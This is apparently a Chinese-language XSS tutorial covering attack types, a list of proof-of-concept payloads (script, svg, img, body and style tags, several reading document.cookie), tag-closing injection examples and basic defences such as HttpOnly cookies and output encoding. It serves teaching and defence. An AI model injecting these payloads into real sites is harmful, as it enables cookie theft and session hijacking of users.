前言
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的Web安全漏洞,攻击者通过在Web应用程序中注入恶意脚本,使得用户在访问受攻击页面时,恶意脚本会被执行,从而导致攻击者窃取用户敏感信息、劫持用户会话等安全问题。XSS攻击可以分为反射型、存储型和DOM型三种类型,其中反射型和存储型是最常见的类型。为了保证Web应用程序的安全性,开发者需要对输入输出进行有效的过滤和验证,避免注入恶意脚本。
一、什么是XSS
XSS (Cross-site scripting) ,中文名为跨站脚本攻击,为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击!
二、XSS有哪些类型
1. 反射型XSS
该类型的脚本代码是非持久化的,需要欺骗用户自己去点击恶意链接,然后触发代码执行。一般出现在搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。
2. 存储型XSS
该类型的脚本代码是持久化的,其存储在被攻击的服务器的数据库中。例如,当在填写个人信息、发表文章等具有表单输入的地方。尤其是插入代码,若输入内容后,前后端没有过滤或过滤不严,那么这些脚本代码就会保存到服务器的数据库中。然后用户访问该页面的时候,触发代码执行,执行非法操作和盗取用户信息。
3. DOM型XSS
DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞,DOM-XSS是通过url传入参数去控制触发的,整个过程都在前端完成。
三、XSS的攻击载荷
1. <script>标签
<script>标签是最直接的XSS有效载荷,脚本标记可以引用外部的JavaScript代码,也可以将代码插入脚本标记中。
<script>alert('hack')</script> # 弹出hack
<script>alert(/hack/)</script> # 弹出hack
<script>alert(1)</script> # 弹出1,对于数字可以不用引号
<script>alert(document.cookie)</script> # 弹出cookie
<script src=/xss.js></script> # 引用外部的xss
2. svg标签
<svg onload='alert(1)'>
3.<img>标签
<img src=1 οnerrοr=alert('hack')>
<img src=1 οnerrοr=alert(document.cookie)> # 弹出cookie
4.<body>标签
<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>
5.style标签
<style οnlοad=alert(1)></style>
四、XSS注入的区域
1. 当输入为HTML注释内容,导致攻击者可以进行闭合绕过
<!-- 用户输入 -->
<!-- --><script>alert('hack')</script><!-- -->
2. 当输入为标签属性名,导致攻击者可以进行闭合绕过
<div 用户输入='xx'> </div>
<div ></div><script>alert('hack')</script><div a='xx'> </div>
3. 当输入为标签属性值,导致攻击者可以进行闭合绕过
<div id='用户输入'></div>
<div id=''></div><script>alert('hack')</script><div a='x'></div>
4. 当输入为标签名,导致攻击者可以进行闭合绕过
<用户输入 id='xx' />
<><script>alert('hack')</script><b id='xx' />
5. 当输入为CSS内容,导致攻击者可以进行闭合绕过
<style>用户输入<style>
<style> </style><script>alert('hack')</script><style> </style>
五、XSS有哪些危害
1. 窃取Cookie
2. 执行非法操作
3. 记录用户键盘输入信息
4. DDos攻击(在一些访问量大网站上 XSS 可以攻击一些小型网站,实现 DDoS 攻击效果。)
5. 钓鱼(攻击者可以利用漏洞注入 DOM,伪造登录框,诱导用户在本不需要登录的页面,去输入自己的用户名和密码。)
六、XSS防护
1. 服务端设置会话Cookie的HTTP Only属性,这样,客户端的JS脚本就不能获取Cookie信息了。
2. 对用户的输入(和URL参数)进行过滤,对输出进行html编码。
3. 若项目有富文本编辑器,需要对内容进行过滤。